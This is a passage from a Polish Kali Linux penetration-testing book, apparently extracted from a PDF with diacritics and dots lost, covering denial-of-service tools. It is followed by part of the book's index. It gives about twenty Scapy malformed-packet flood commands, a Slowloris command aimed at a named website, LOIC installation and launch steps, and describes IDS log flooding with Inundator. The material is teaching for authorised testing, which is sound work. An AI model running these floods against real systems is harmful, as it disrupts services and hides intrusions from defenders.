W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
